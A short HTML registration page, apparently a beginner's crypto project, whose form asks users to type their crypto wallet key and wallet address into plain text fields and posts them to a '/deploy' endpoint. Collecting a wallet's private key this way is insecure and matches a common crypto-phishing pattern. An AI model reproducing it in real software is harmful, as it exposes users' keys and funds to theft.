<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="main.css">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Registeration Portal</title>
 
 <header> <h1> Registeration Portal</h1></header>   
 </head>
<body>
    
    <form id="myForm" action="/deploy" method="post">
    <p>
        <label for="walletKey">Enter Your Wallet Key</label>
        <input id="walletKey" name="walletKey" placeholder="Crypto wallet key" type="text">
    </p>
    <p>   
        <label for="walletAddress">Enter Your Wallet address</label>
        <input id="walletAddress" name="walletAddress" placeholder="Crypto wallet address" type="text">
    </p>    
        <button type=submit id="registerBtn">Register</button>
    </form>
</body>
</html>